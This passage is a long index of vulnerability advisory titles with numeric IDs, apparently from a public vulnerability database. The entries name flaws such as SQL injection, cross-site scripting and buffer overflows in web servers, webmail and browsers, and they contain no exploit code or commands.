(QuickWeb) Login.ASP SQL Injection Vulnerability [14072] WebCalendar Assistant_Edit.PHP Unauthorized Access Vulnerability [14031] Asterisk Manager Interface Command Processing Remote Buffer Overflow Vulnerability [14025] Veritas Backup Exec Web Administration Console Remote Buffer Overflow Vulnerability [14010] ICab Web Browser Dialog Box Origin Spoofing Vulnerability [14009] Opera Web Browser Dialog Box Origin Spoofing Vulnerability [13988] Sun ONE/iPlanet Messaging Server Webmail MSIE HTML Injection Vulnerability [13974] e107 Website System Multiple Input Validation and Information Disclosure Vulnerabilities [13970] Opera Web Browser XMLHttpRequest Object Cross-Domain Access Vulnerability [13969] Opera Web Browser Cross-Site Scripting Local File Disclosure Vulnerability [13952] Microsoft Exchange Server Outlook Web Access HTML Injection Vulnerability [13950] Microsoft Windows Web Client Service Remote Code Execution Vulnerability [13946] Microsoft Internet Explorer Unspecified DigWebX ActiveX Control Vulnerability [13945] Sun Java Web Start Unspecified Privilege Escalation Vulnerability [13930] Darryl Burgdorf Webhints Remote Command Execution Vulnerability [13912] IBM AIX diagTasksWebSM Command Line Argument Local Buffer Overflow Vulnerability [13890] ObjectWeb Consortium C-JDBC Query Result Cache Disclosure Vulnerability [13859] WWWeb Concepts Events System LOGIN.ASP SQL Injection Vulnerability [13853] IBM WebSphere Application Server Administrative Console Buffer Overflow Vulnerability [13851] Popper Webmail ChildWindow.Inc.PHP Remote File Include Vulnerability [13850] LiteWeb Server Authentication Bypass Vulnerability [13834] NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability [13819] MyBB Website Field HTML Injection Vulnerability [13811] NikoSoft WebMail Unspecified Cross-Site Scripting Vulnerability [13807] Newmad Technologies PicoWebServer Remote Buffer Overflow Vulnerability [13794] BEA WebLogic Administration Console Error Page Cross-Site Scripting Vulnerability [13793] BEA WebLogic Administration Console LoginForm.jsp Cross-Site Scripting Vulnerability [13780] Gentoo Webapp-Config Insecure File Creation Vulnerability [13762] MaxWebPortal Password.ASP SQL Injection Vulnerability [13730] Distinct Web Creations NewsletterEZ Login.ASP SQL Injection Vulnerability [13722] Sambar Server Administrative Interface Multiple Cross-Site Scripting Vulnerabilities [13717] BEA WebLogic Server and WebLogic Express Multiple Remote Vulnerabilities [13653] Fastream NETFile FTP/Web Server FTP Bounce Vulnerability [13640] Sigma ISP Manager Sigmaweb.DLL SQL Injection Vulnerability [13607] Microsoft Windows Media Player Digital Rights Management Arbitrary Web Page Launch Weakness [13601] MaxWebPortal Multiple Remote Vulnerabilities [13577] e107 Website System Global Variables Unauthorized Access Vulnerability [13576] e107 Website System Forum_viewforum.PHP SQL Injection Vulnerability [13573] e107 Website System Request.PHP Directory Traversal Vulnerability [13572] e107 Website System Search.PHP Remote File Include Vulnerability [13538] 4D WebStar Tomcat Plugin Remote Buffer Overflow Vulnerability [13524] RSA Security RSA Authentication Agent For Web Remote Heap Buffer Overflow Vulnerability [13521] 04WebServer Directory Traversal Vulnerability [13501] YusASP Web Asset Manager Unauthorized Access Vulnerability [13482] WebCrossing WebX Cross-Site Scripting Vulnerability [13472] Open WebMail Remote Arbitrary Shell Command Execution Vulnerability [13466] MaxWebPortal Multiple SQL Injection Vulnerabilities [13459] Video Cam Server Administrative Interface Authentication Bypass Vulnerability [13428] Just William's Amazon Webstore HTTP Response Splitting Vulnerability [13427] Just William's Amazon Webstore CurrentNumber Parameter Cross-Site Scripting Vulnerability [13426] Just William's Amazon Webstore SearchFor Parameter Cross-Site Scripting Vulnerability [13425] Just William's Amazon Webstore CurrentIsExpanded Parameter Cross-Site Scripting Vulnerability [13422] Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting Vulnerability [13421] Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability [13420] Oracle Application Server 9i Webcache Arbitrary File Corruption Vulnerability [13419] Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability [13400] BEA WebLogic Server And WebLogic Express Administration Console Cross-Site Scripting Vulnerability [13388] Fastream NetFile FTP/Web Server Directory Traversal Variant Vulnerability [13378] MySQL MaxDB WebDAV IF Parameter Remote Buffer Overflow Vulnerability [13374] SQWebmail HTTP Response Splitting Vulnerability [13369] MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability [13349] IBM WebSphere Application Server Error Page Cross-Site Scripting Vulnerability [13293] NetMailshar Professional Webmail Service Directory Traversal Vulnerability [13268] Sun Java System Web Proxy Server Multiple Unspecified Remote Buffer Overflow Vulnerabilities [13263] WheresJames Webcam Publisher Web Server Buffer Overflow Vulnerability [13262] GeneWeb Maintainer Scripts Unspecified Insecure File Operations Vulnerability [13250] WebcamXP Chat Name HTML Code Injection Vulnerability [13240] F5 BIG-IP User Interface Login Credential Caching Vulnerability [13227] PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability [13205] Webmin And Usermin Configuration File Unauthorized Access Vulnerability [13202] Apple WebCore Framework XMLHttpRequests Remote Code Execution Vulnerability [13198] Xerox MicroServer Web Server Default Account Authentication Bypass Vulnerability [13180] Kerio MailServer WebMail Remote Resource Exhaustion Vulnerability [13168] RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability [13165] Sun Java System Web Server Unspecified Denial of Service Vulnerability [13160] IBM WebSphere Application Server Web Server Root JSP Source Code Disclosure Vulnerability [13113] AEwebworks Dating Software AeDating Control Panel Cross-Site Scripting Vulnerability [13111] AEwebworks Dating Software AeDating Sdating.PHP SQL Injection Vulnerability [13108] AEwebworks Dating Software AeDating Index.PHP Local File Include Vulnerability [13101] WebCT Discussion Board HTML Injection Vulnerability [13081] Citrix MetaFrame Web Client Access Restriction Bypass Vulnerability [13078] Microsoft Outlook and Outlook Web Access Source Email Address Spoofing Weakness [13074] Maxthon Web Browser Plug-in API Directory Traversal Vulnerability [13073] Maxthon Web Browser Plug-in API Security ID Information Disclosure Vulnerability [13055] PHP-Nuke Web_Links Module Multiple SQL Injection Vulnerabilities [13045] IBM Lotus Domino Server Web Service Remote Denial Of Service Vulnerability [13037] WebWasher Conf Script Cross-Site Scripting Vulnerability [13025] PHP-Nuke Web_Links Module Multiple Cross-Site Scripting Vulnerabilities [12938] WebAPP Unspecified File Disclosure Vulnerability [12937] FastStone 4in1 Browser Web Server Remote Directory Traversal Vulnerability [12898] Maxthon Web Browser Search Bar Information Disclosure Vulnerability [12847] Sun Java Web Start System Property Tags Remote Unauthorized Access Vulnerability [12842] Webroot My Firewall Local Insecure File Creation Vulnerability [12834] Microsoft Windows Graphical Device Interface Library Denial Of Service Vulnerability [12812] IBM WebSphere Application Server Remote Information Disclosure Vulnerability [12805] MySQL MaxDB WebAgent Input Validation Multiple Remote Denial Of Service Vulnerabilities [12783] Xerox Document Centre ESS/Network Controller Web Server Remote Authentication Bypass Vulnerability [12782] Xerox MicroServer Web Server Remote Denial Of Service Vulnerability [12778] PY Software Active Webcam Webserver Multiple Vulnerabilities [12773] WEBInsta Mailing Manager Remote File Include Vulnerability [12747] Jason Hines PHPWebLog Remote File Include Vulnerability [12731] Xerox Microserver Web Server Unspecified Remote Authorization Bypass Vulnerability [12679] WebMod Content-Length Remote Heap Overflow Vulnerability [12662] CIS WebServer Remote Directory Traversal Vulnerability [12653] PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability [12640] ELOG Web Logbook Multiple Remote Unspecified Vulnerabilities [12639] ELOG Web Logbook Attached Filename Remote Buffer Overflow Vulnerability [12613] OpenConnect WebConnect Multiple Remote Vulnerabilities [12606] Xinkaa WEB Station Directory Traversal Vulnerability [12581] WebCalendar SQL Injection Vulnerability [12556] ELOG Web Logbook Multiple Remote Vulnerabilities [12550] Opera Web Browser Multiple Remote Vulnerabilities [12548] BEA WebLogic Server And WebLogic Express Authentication Failure Information Disclosure Weakness [12547] Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability [12538] IBM WebSphere Application Server File Servlet Source Code Disclosure Vulnerability [12537] IBM WebSphere Application Server JSP Engine Source Code Disclosure Vulnerability [12532] Gentoo Portage-Built Webmin Binary Package Build Host Root Password Disclosure Vulnerability [12461] Multiple Web Browser International Domain Name Handling Site Property Spoofing Vulnerabilities [12459] Microsoft Outlook Web Access Login Form Remote URI Redirection Vulnerability [12429] Savant Web Server Remote Buffer Overflow Vulnerability [12416] Eternal Lines Web Server Remote Denial Of Service Vulnerability [12399] Captaris Infinite Mobile Delivery Webmail Path Disclosure Vulnerability [12396] IceWarp Web Mail Multiple Remote Vulnerabilities [12395] Alt-N WebAdmin Multiple Remote Vulnerabilities [12394] WebWasher Classic HTTP CONNECT Unauthorized Access Weakness [12313] MySQL MaxDB WebAgent Remote Denial of Service Vulnerabilities [12310] Novell GroupWise WebAccess Multiple Cross-Site Scripting Vulnerabilities [12285] Novell GroupWise WebAccess Remote Authentication Bypass Vulnerability [12275] Squid Proxy Web Cache Communication Protocol Denial Of Service Vulnerability [12265] MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow Vulnerability [12260] Sun Solaris Management Console User Interface Insecure Account Creation Vulnerability [12231] Bottomline Technologies WebSeries Design Error Vulnerabilities [12216] BottomLine Webseries Payment Application Access Control Bypass Vulnerability [12203] Dillo Interface Message Format String Vulnerability [12194] Novell GroupWise WebAccess Potential Information Disclosure Vulnerability [12183] Jeuce Personal Web Server Directory Traversal And Denial Of Service Vulnerabilities [12164] IceWarp Merak Mail Server Unspecified Web Admin Vulnerability [12143] IceWarp Web Mail Session ID Disclosure Vulnerability [12140] IWebNegar Multiple Remote Vulnerabilities [12132] KorWeblog Remote File Include Vulnerability [12090] IceWarp Web Mail Directory Traversal Vulnerability [12086] NetWin SurgeMail Webmail Unspecified Vulnerability [12069] PHPAuction Administrative Interface Authentication Bypass Vulnerability [12065] Webroot Software Spy Sweeper Enterprise Local Privilege Escalation Vulnerability [12064] Webroot Software My Firewall Plus Local Privilege Escalation Vulnerability [12023] PGN2WEB Buffer Overflow Vulnerability [12016] UML_Utilities UML_Net Slip Network Interface Denial Of Service Vulnerability [11972] Sun ONE/iPlanet Messaging Server Webmail HTML Injection Vulnerability [11949] Apple Safari Web Browser HTML Form Status Bar Misrepresentation Vulnerability [11946] IWebNegar Multiple SQL Injection Vulnerabilities [11918] Sun Java System Web And Application Server Remote Session Disclosure Vulnerability [11901] Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability [11894] PhpGedView Gdbi_interface.PHP Cross-Site Scripting Vulnerability [11883] Opera Web Browser Download Dialogue Box File Name Spoofing Vulnerability [11876] ICab Web Browser Remote Window Hijacking Vulnerability [11875] Omni Group OmniWeb Browser Remote Window Hijacking Vulnerability [11856] Opera Web Browser Remote Window Hijacking Vulnerability [11848] Darryl Burgdorf WebLibs Directory Traversal Vulnerability [11844] MySQL MaxDB WebDav Handler Overwrite Header Remote Buffer Overflow Vulnerability [11816] IBM WebSphere Commerce Default User Information Disclosure Vulnerability [11773] Groupmax World Wide Web Cross-Site Scripting And Directory Traversal Vulnerabilities [11762] Opera Web Browser Infinite Array Sort Denial Of Service Vulnerability [11761] Mozilla Camino Web Browser Infinite Array Sort Denial Of Service Vulnerability [11759] Apple Safari Web Browser Infinite Array Sort Denial Of Service Vulnerability [11744] KorWeblog Remote Directory Listing Vulnerability [11727] Plain Black Software WebGUI Unspecified Remote Vulnerability [11717] Computer Associates eTrust EZAntivirus User Interface Local Authentication Bypass Vulnerability [11712] Opera Web Browser Java Implementation Multiple Remote Vulnerabilities [11687] Fastream NetFile FTP/Web Server HEAD Request Denial Of Service Vulnerability [11673] PHPWebSite User Module HTTP Response Splitting Vulnerability [11652] 04WebServer Multiple Remote Vulnerabilities [11651] WebCalendar Multiple Remote Vulnerabilities [11636] Sun One/IPlanet Messaging Server Webmail Unauthorized Email Access Vulnerability [11611] IceWarp Web Mail Multiple Remote Vulnerabilities [11605] Microsoft ISA and Proxy Server Web Site Spoofing Vulnerability [11593] Sun Java System Web And Application Servers Remote Denial Of Service Vulnerability [11588] Webroot Software Spy Sweeper Enterprise Plain Text Password Storage Weakness [11586] WebHost Automation Helm Control Panel Multiple Input Validation Vulnerabilities [11585] Minihttp Forum Web Server Plain Text Password Storage Vulnerability [11578] MailEnable Professional Webmail Unspecified Vulnerability [11573] Apple Safari Web Browser TABLE Status Bar URI Obfuscation Weakness [11566] Sun Java System Web Proxy Server Multiple Unspecified Buffer Overflow Vulnerabilities [11562] Global Spy Software Cyber Web Filter IP Filter Bypass Vulnerability [11544] Omni Group OmniWeb Browser Cross-Domain Dialog Box Spoofing Vulnerability [11531] ICab Web Browser Cross-Domain Dialog Box Spoofing Vulnerability [11476] Maxthon Web Browser Cross-Domain Tab Window Form Field Focus Vulnerability [11475] Opera Web Browser Cross-Domain Dialog Box Spoofing Vulnerability [11470] Maxthon Web Browser Cross-Domain Dialog Box Spoofing Vulnerability [11426] Express-Web Content Management System Unspecified Cross-Site Scripting Vulnerability [11399] IBM DB2 Stored Procedure Interface Library Name Buffer Overflow Vulnerability [11398] IBM DB2 Application Programming Interface Multiple Unspecified Buffer Overflow Vulnerabilities [11371] IceWarp Web Mail Multiple Unspecified Remote Input Validation Vulnerabilities [11346] MySQL MaxDB WebDBM Server Name Denial of Service Vulnerability [11342] Microsoft ASP.NET URI Canonicalization Unauthorized Web Access Vulnerability [11326] NetworkActiv Web Server Remote Denial of Service Vulnerability [11307] RealNetworks RealOne Player And RealPlayer Unspecified Web Page Code Execution Vulnerability [11254] MyWebServer Multiple Remote Vulnerabilities [11246] Full Revolution aspWebCalendar and aspWebAlbum Multiple SQL Injection Vulnerabilities [11234] AllWebScripts MySQLGuest HTML Injection Vulnerability [11209] Business Objects WebIntelligence Remote File Name HTML Injection Vulnerability [11208] Business Objects WebIntelligence Access Control Bypass File Deletion Vulnerability [11188] HP Web Jetadmin Unspecified Arbitrary Command Execution Vulnerability [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability [11168] Multiple BEA Systems WebLogic Vulnerabilities [11153] Webmin / Usermin Installation Insecure Temporary File Creation Vulnerability [11122] Webmin / Usermin HTML Email Command Execution Vulnerability [11090] Opera Web Browser Empty Embedded Object JavaScript Denial Of Service Vulnerability [11088] PHPWebSite Multiple Input Validation Vulnerabilities [11073] Web Animations Password Protect Multiple Input Validation Vulnerabilities [11071] Xedus Web Server Multiple Vulnerabilities [11054] Webroot Software Window Washer Data Exposure Vulnerability [11045] Webmatic Unspecified Security Vulnerability [11037] Dynix WebPac Multiple Undisclosed SQL Injection Vulnerabilities [11036] Easy File Sharing Web Server Remote Denial Of Service Vulnerability [11034] Easy File Sharing Web Server Access Control Bypass Vulnerability [11028] Web-APP.Org WebAPP Directory Traversal Vulnerability [11000] Novell NetWare Web Manager Unspecified Vulnerability [10999] Safari/WebCore HTTP Content Filtering Bypass Vulnerability [10998] Multiple Vendor Web Browser JavaScript Denial Of Service Vulnerability [10997] Opera Web Browser JavaScript Denial Of Service Vulnerability [10988] Nihuo Web Log Analyzer HTML Injection Vulnerability [10983] Working Resources BadBlue Webserver Denial Of Service Vulnerability [10966] Merak Mail Server Webmail Multiple Vulnerabilities [10961] Opera Web Browser Resource Detection Weakness [10942] PHPMyWebHosting SQL Injection Vulnerability [10920] IceWarp Web Mail Multiple Remote Input Validation Vulnerabilities [10918] Clearswift MIMEsweeper For Web Directory Traversal Vulnerability [10902] Microsoft Exchange Outlook Web Access HTTP Response Splitting Vulnerability [10869] Neon WebDAV Client Library Unspecified Vulnerability [10863] Multiple Free Web Chat Denial Of Service Vulnerabilities [10842] Webbsyte Chat Denial Of Service Vulnerability [10840] U.S. Robotics USR808054 Wireless Access Point Web Administration Denial Of Service Vulnerability [10837] Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting Vulnerability [10832] Mozilla Firefox XML User Interface Language Browser Interface Spoofing Vulnerability [10818] Hitachi Web Page Generator Cross-Site Scripting and Information Disclosure Vulnerabilities [10817] Hitachi Web Page Generator Unspecified Denial Of Service Vulnerability [10810] Opera Web Browser Location Replace URI Obfuscation Weakness [10792] EasyWeb FileManager Module Directory Traversal Vulnerability [10780] Samba Web Administration Tool Base64 Decoder Buffer Overflow Vulnerability [10773] Leigh Business Enterprises Web HelpDesk SQL Injection Vulnerability [10771] Internet Software Sciences Web+Center Cookie Object SQL Injection Vulnerability [10764] Opera Web Browser Unspecified Certificate Verification Vulnerability [10763] Opera Web Browser Cross-Domain Frame Loading Vulnerability [10756] Outblaze Webmail HTML Injection Vulnerability [10746] Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability [10744] Extropia WebStore Remote Command Execution Vulnerability [10735] AnomicHTTPProxy Administrative Interface Denial Of Service Vulnerability [10733] AnomicHTTPProxy Administrative Interface Authentication Bypass Vulnerability [10721] 4D WebStar Multiple Remote Information Disclosure Vulnerabilities [10720] 4D WebStar Remote FTP Buffer Overflow Vulnerability [10719] INweb Mail Server Remote Denial Of Service Vulnerability [10714] 4D WebStar Symbolic Link Vulnerability [10679] Opera Web Browser IFrame OnLoad Address Bar URL Obfuscation Weakness [10673] Mbedthis Software AppWeb HTTP Server Multiple Vulnerabilities [10667] Open WebMail Email Header HTML Injection Vulnerability [10666] BasiliX Webmail Email Header HTML Injection Vulnerability [10658] Fastream NetFile FTP/Web Server Directory Traversal Vulnerability [10651] IBM Websphere Edge Server Denial Of Service Vulnerability [10641] IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability [10637] Open WebMail Vacation.PL Remote Command Execution Variant Vulnerability [10630] HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerability [10628] Dr. Web Unspecified Buffer Overflow Vulnerability [10624] BEA WebLogic Server And WebLogic Express Application Role Unauthorized Access Vulnerability [10614] WebSoft Infinity WEB SQL Injection Vulnerability [10613] WebSoft HelpDesk PRO SQL Injection Vulnerability [10592] ArbitroWeb PHP Proxy Cross-Site Scripting Vulnerability [10588] SqWebMail Email Header HTML Injection Vulnerability [10585] Multiple Vendor Broadband Router Web-Based Administration Denial Of Service Vulnerability [10555] Web Wiz Forums Registration_Rules.ASP Cross-Site Scripting Vulnerability [10545] BEA WebLogic Server And WebLogic Express Java RMI Incorrect Session Inheritance Vulnerability [10544] BEA WebLogic Server And WebLogic Express Remote Denial of Service Vulnerability [10533] Linksys Web Camera Software Next_file Parameter Cross-Site Scripting Vulnerability [10523] Webmin And Usermin Account Lockout Bypass Vulnerability [10522] Webmin Configuration Module Information Disclosure Vulnerability [10510] Billion BIPAC-640 AE Administrative Interface Authentication Bypass Vulnerability [10483] NetWin SurgeMail/WebMail Multiple Input Validation Vulnerabilities [10482] Microsoft ISA Server Redirect URI Handler Web Proxy Service Remote Denial Of Service Vulnerability [10477] Microsoft ISA Server Web Proxy Malformed SSL Packet Remote Denial of Service Vulnerability [10476] Linksys Web Camera Software Next_file Parameter File Disclosure Vulnerability [10474] Webmin Multiple Unspecified Vulnerabilities [10445] Rit Research Labs TinyWeb Server Unauthorized Script Disclosure Vulnerability [10436] e107 Website System Multiple Vulnerabilities [10421] WildTangent WebDriver Remote Filename Buffer Overflow Vulnerability [10405] e107 Website System User.PHP HTML Injection Vulnerability [10395] e107 Website System Log.PHP HTML Injection Vulnerability [10385] Neon WebDAV Client Library ne_rfc1036_parse Function Heap Overflow Vulnerability [10362] VBulletin Index.PHP User Interface Spoofing Weakness [10357] WebCT Campus Edition HTML Tags HTML Injection Vulnerabilities [10353] NetChat Web Server Remote Buffer Overflow Vulnerability [10337] Opera Web Browser Address Bar Spoofing Weakness [10328] BEA WebLogic Server And WebLogic Express Lowered Security Settings Vulnerability [10327] BEA WebLogic Server and WebLogic Express Denial of Service Vulnerability [10317] EMule Web Control Panel Denial Of Service Vulnerability [10316] Open WebMail Remote Command Execution Variant Vulnerability [10306] Adam Webb NukeJokes Module For PHP-Nuke Multiple Input Validation Vulnerabilities [10303] MyWeb HTTP Server GET Request Buffer Overflow Vulnerability [10294] SurgeLDAP Web Administration Authentication Bypass Vulnerability [10293] e107 Website System Multiple Script HTML Injection Vulnerability [10274] OMail Webmail Remote Command Execution Variant Vulnerability [10262] Aldo's Web Server Multiple Input Validation Vulnerabilities [10260] Business Objects Crystal Reports Web Form Viewer Directory Traversal Vulnerability [10255] Web Wiz Forum Multiple Vulnerabilities [10224] HP Web Jetadmin Multiple Vulnerabilities [10220] PHPWebSite phpwsBB and phpwsContacts Modules Information Disclosure Vulnerability [10207] Artmedic Webdesign Hpmaker Script Multiple Vulnerabilities [10188] BEA WebLogic Server And WebLogic Express Configuration Log Files Plain Text Password Vulnerability [10185] BEA WebLogic Server/Express EJB Object Removal Denial Of Service Vulnerability [10184] BEA WebLogic Server and WebLogic Express Illegal URI Pattern Potential Bypass Vulnerability [10169] Fastream NetFile FTP/Web Server Denial Of Service Vulnerability [10136] Neon WebDAV Client Library Format String Vulnerabilities [10133] BEA WebLogic Local Password Disclosure Vulnerability [10132] BEA WebLogic Server and WebLogic Express Certificate Chain User Impersonation Vulnerability [10131] BEA WebLogic Server/Express Potential Password Disclosure Weakness [10130] BEA WebLogic Authentication Provider Privilege Inheritance Vulnerability [10106] Ipswitch IMail Express Web Messaging Buffer Overrun Vulnerability [10087] Open WebMail Arbitrary Directory Creation Vulnerability [10081] Opera Web Browser Remote IFRAME Denial Of Service Vulnerability [10075] Kerio Personal Firewall Web Filtering Remote Denial Of Service Vulnerability [10056] Microsoft Internet Explorer MSWebDVD Object Denial of Service Vulnerability [10055] F-Secure BackWeb Local Privilege Escalation Vulnerability [10051] Multiple Monit Administration Interface Remote Vulnerabilities [10040] Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability [10001] Cloisterblog Administration Interface Authentication Weakness [9999] WebCT Campus Edition HTML Injection Vulnerability [9995] Web Fresh Fresh Guest Book HTML Injection Vulnerability [9977] Trend Micro Interscan WebManager Java TeleWindow Unspecified Credential Theft Vulnerability [9973] HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability [9972] HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability [9971] HP Web Jetadmin Printer Firmware Update Script Arbitrary File Upload Weakness [9966] Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability [9937] XWeb Directory Traversal Vulnerability [9901] IBM Lotus Domino HTTP webadmin.nsf Quick Console Cross-Site Scripting Vulnerability [9900] IBM Lotus Domino HTTP webadmin.nsf Directory Traversal Vulnerability [9894] Fizmez Web Server Null Connection Denial Of Service Vulnerability [9869] Opera Web Browser Large JavaScript Array Handling Vulnerability [9868] Oracle Application Server Web Cache HTTP Request Method Heap Overrun Vulnerability [9864] Novell GroupWise WebAccess Unauthorized Access Vulnerability [9861] Emumail EMU Webmail Multiple Vulnerabilities [9856] Dogpatch Software CFWebstore Cross-Site Scripting Vulnerability [9854] Dogpatch Software CFWebstore SQL Injection Vulnerability [9847] Pegasi Web Server Multiple Input Validation Vulnerabilities [9833] IBM WebSphere Unspecified Security Vulnerability [9817] PWebServer Remote Directory Traversal Vulnerability [9808] Seattle Lab Software SLWebMail Multiple Buffer Overflow Vulnerabilities [9807] DAWKCo POP3 with WebMAIL Extension Session Timeout Unauthorized Access Vulnerability [9795] SureCom Network Device Malformed Web Authorization Request Denial Of Service Vulnerability [9781] Software602 602Pro LAN Suite Web Mail Installation Path Disclosure Vulnerability [9777] Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability [9750] Dell OpenManage Web Server POST Request Heap Overflow Vulnerability [9749] CalaCode @mail Webmail System POP3 Remote Denial of Service Vulnerability [9748] CalaCode @mail Webmail System Cross-Site Scripting Vulnerability [9742] GWeb HTTP Server Directory Traversal Vulnerability [9723] Avirt Soho Web Service HTTP GET Buffer Overrun Vulnerability [9716] Proxy-Pro Professional GateKeeper Web Proxy Buffer Overrun Vulnerability [9693] WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability [9685] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [9681] APC SmartSlot Web/SNMP Management Card Default Password Vulnerability [9678] Vizer Web Server Remote Denial of Service Vulnerability [9664] Voice Of Web AllMyPHP Remote File Include Vulnerabilities [9640] Opera Web Browser CLSID File Extension Misrepresentation Vulnerability [9625] MaxWebPortal Multiple Input Validation Vulnerabilities [9576] Web Crossing Web Server Component Remote Denial Of Service Vulnerability [9561] Sun ONE/iPlanet Web Server HTTP TRACE Credential Theft Vulnerability [9545] MiniHTTPServer WebForums Forum HTML Injection Vulnerability [9541] SqWebMail Authentication Response Information Leakage Weakness [9539] Leif M. Wright Web Blog Remote Command Execution Vulnerability [9517] Leif M. Wright Web Blog File Disclosure Vulnerability [9516] BRS WebWeaver ISAPISkeleton.dll Cross-Site Scripting Vulnerability [9508] Novell Groupwise Webaccess Cross Site Scripting Vulnerability [9506] WebLogic Server and Express HTTP TRACE Credential Theft Vulnerability [9505] BEA WebLogic Incorrect Operator Permissions Password Disclosure Vulnerability [9503] BEA WebLogic Server/Express Potential Administrator Password Disclosure Weakness [9502] BEA WebLogic Server and Express SSL Client Privilege Escalation Vulnerability [9501] BEA WebLogic Operator/Admin Password Disclosure Vulnerability [9495] Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability [9494] Mbedthis Software AppWeb HTTP Server Empty Options Request Denial Of Service Vulnerability [9486] Borland Webserver for Corel Paradox Directory Traversal Vulnerability [9482] Reptile Web Server Remote Denial Of Service Vulnerability [9479] Novell Netware Enterprise Web Server Multiple Vulnerabilities [9465] Darkwet Network WebcamXP Cross-Site Scripting Vulnerability [9456] AIPTEK NETCam Webserver Directory Traversal Vulnerability [9452] GoAhead WebServer Post Content-Length Remote Resource Consumption Vulnerability [9451] GetWare Web Server Component Content-Length Value Remote Denial Of Service Vulnerability [9450] GoAhead WebServer Directory Management Policy Bypass Vulnerability [9418] Symantec Web Security Block Page Message Cross-Site Scripting Vulnerability [9412] Novell iChain Web Server Failed Login Page Cross-Site Scripting Vulnerability [9409] Microsoft Exchange Server 2003 Outlook Web Access Random Mailbox Access Vulnerability [9405] BEA WebLogic Ant Tasks Administrative Password Exposure Vulnerability [9399] Sun Microsystems Sun One Web Server Remote Buffer Overflow Vulnerability [9394] DansGuardian Webmin Module Edit.CGI Remote Directory Traversal Vulnerability [9390] Hand-Crafted Software FreeProxy FreeWeb CreateFile Function Denial of Service Vulnerability [9388] Hand-Crafted Software FreeProxy FreeWeb Directory Traversal Vulnerability [9374] Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting Vulnerability [9373] ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability [9351] Webcam Corp Webcam Watchdog Web Server Buffer Overflow Vulnerability [9349] Athena Web Registration Remote Command Execution Vulnerability [9310] MiniBB Profile Website Name HTML Injection Vulnerability [9301] Web Merchant Services Storefront Shopping Cart login.asp SQL Injection Vulnerability [9289] Webfroot Shoutbox Viewshoutbox.PHP Cross-Site Scripting Vulnerability [9276] PServ Web Server Directory Traversal Vulnerability [9273] DCAM WebCam Server Personal Web Server Directory Traversal Vulnerability [9261] PY Software Active Webcam Webserver Cross-Site Scripting Vulnerability [9260] PY Software Active Webcam Webserver Directory Traversal Vulnerability [9256] Xerox MicroServer Web Server Remote Directory Traversal Vulnerability [9239] GoAhead Webserver ASP Script File Source Code Disclosure Vulnerability [9200] Cyclonic Webmail Information Disclosure Vulnerability [9195] Cyclonic Webmail Authentication Bypass Vulnerability [9181] BNCweb BNCquery.pl File Disclosure Vulnerability [9180] @mail Webmail System Multiple Vulnerabilities [9171] Abyss Web Server Authentication Bypass Vulnerability [9169] Webgate WebEye Information Disclosure Vulnerability [9149] Websense Enterprise Blocked Sites Cross-Site Scripting Vulnerability [9146] Sun ONE/iPlanet Web Server Unspecified Denial of Service Vulnerability [9132] Surfboard Web Server File Disclosure Vulnerability [9118] Microsoft Exchange Server 2003 Outlook Web Access Lowered Security Settings Weakness [9112] Macromedia JRun Administrative Interface Multiple Cross-Site Scripting Vulnerabilities [9065] Apple Safari Web Browser Null Character Cookie Stealing Vulnerability [9060] HP-UX IPFilter Unsupported Interface Vulnerability [9059] NetServe Web Server Directory Traversal Vulnerability [9058] SqWebMail Session Hijacking Vulnerability [9053] phpWebFileManager index.php Directory Traversal Vulnerability [9051] SAP DB web-tools Multiple Vulnerabilities [9043] Web Wiz Forums location HTML Injection Vulnerability [9039] WebWasher Classic Error Message Cross-Site Scripting Vulnerability [9034] Multiple BEA WebLogic Server/Express Denial of Service and Information Disclosure Vulnerabilities [9027] Spoofed Kernel Netlink Interface Message Denial of Service Vulnerability [9021] Opera Web Browser Opera: URI Handler Directory Traversal Vulnerability [8998] TelCondex SimpleWebserver Directory Traversal Vulnerability [8965] IA WebMail Server Long GET Request Buffer Overrun Vulnerability [8957] Web Wiz Forum Unauthorized Private Forum Access Vulnerability [8947] BRS WebWeaver httpd `User-Agent` Remote Denial of Service Vulnerability [8943] Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability [8941] Plug and Play Web Server Remote Denial of Service Vulnerability [8938] BEA WebLogic InteractiveQuery.jsp Cross-Site Scripting Vulnerability [8931] BEA Tuxedo and WebLogic Enterprise Input Validation Vulnerability [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability [8925] TelCondex SimpleWebserver HTTP Referer Remote Buffer Overflow Vulnerability [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability [8909] InfronTech WebTide Directory/File Disclosure Vulnerability [8887] Opera Web Browser IFRAME Zone Restriction Bypass Vulnerability [8878] HP Management Software Web Agents Unspecified Unauthorized Access Vulnerability [8869] PSCS VPOP3 Email Server WebAdmin Cross-Site Scripting Vulnerability [8866] Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities [8855] 